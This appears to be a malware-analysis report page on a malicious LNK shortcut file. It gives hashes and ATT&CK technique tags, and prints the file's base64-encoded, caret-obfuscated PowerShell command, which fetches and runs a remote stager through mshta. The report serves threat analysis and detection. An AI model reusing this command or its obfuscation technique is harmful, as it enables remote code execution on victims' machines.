Malicious
Malicious

04547c546f876f2809b3c94c5d659766

LNK File
|
MD5: 04547c546f876f2809b3c94c5d659766
|
Size: 2.84 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
04547c546f876f2809b3c94c5d659766
Sha1
e91773fc29d2307b6f912c4beb0b5a5badb3c8db
Sha256
1156ddbe6effa99cff7a6af27b323ac1d257e1352549cc5407287c371e6b83ca
Sha384
467ecb730aa018328228111e1efb970ef99d829c506e7ab45308580e5295a2705c5e7eff38f03287d6436c221760e228
Sha512
35aa9f7f435ca678af9c789b1264ed57b2399caa972b3fc7449903589aeb186a8cb4ad7a40abe16a64e4af5c2d72718e1e72476325e28adaf1f6bd165c81f7ca
SSDeep
48:8y5aaz5k7Rm6k7xapLaMbLYmvfdJ91Ir:8y5Tz67MP7xLWL7jbI
TLSH
565186281AF211FEFA73C6B99BF573F34522FBD79D2586BC108062854622104B467A3A
File Structure
04547c546f876f2809b3c94c5d659766
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAHMAXgBoAF4AXgB0AGEAIABoAF4AXgBeAF4AdAB0AF4AXgBwAHMAXgBeAF4AXgA6AF4AXgBeAF4ALwBeAF4ALwBeAF4AXgBzAF4AXgBeAF4AawBeAF4AXgBeAGkAbgBeAF4AXgBeAHMAbwBuAF4AcwBrAF4AXgBeAF4AaQBuAF4AXgBeAHMAXgBeAG0AXgBeAF4AYQByAF4AXgBeAF4AawBeAF4AXgBlAF4AXgB0AF4AXgAuAF4AXgBeAF4AaQBeAF4AXgBuAF4AXgBmAG8AXgBeAF4ALwBhAHAAXgBeAF4AXgBwAF4AXgAvAHMAXgBeAF4AdABhAGcAXgBlAF4AXgBeAHIALgBeAF4AbQBeAF4AXgBwAF4AXgBeAF4ANABeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA=
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAHMAXgBoAF4AXgB0AGEAIABoAF4AXgBeAF4AdAB0AF4AXgBwAHMAXgBeAF4AXgA6AF4AXgBeAF4ALwBeAF4ALwBeAF4AXgBzAF4AXgBeAF4AawBeAF4AXgBeAGkAbgBeAF4AXgBeAHMAbwBuAF4AcwBrAF4AXgBeAF4AaQBuAF4AXgBeAHMAXgBeAG0AXgBeAF4AYQByAF4AXgBeAF4AawBeAF4AXgBlAF4AXgB0AF4AXgAuAF4AXgBeAF4AaQBeAF4AXgBuAF4AXgBmAG8AXgBeAF4ALwBhAHAAXgBeAF4AXgBwAF4AXgAvAHMAXgBeAF4AdABhAGcAXgBlAF4AXgBeAHIALgBeAF4AbQBeAF4AXgBwAF4AXgBeAF4ANABeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA="
04547c546f876f2809b3c94c5d659766 (2.84 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙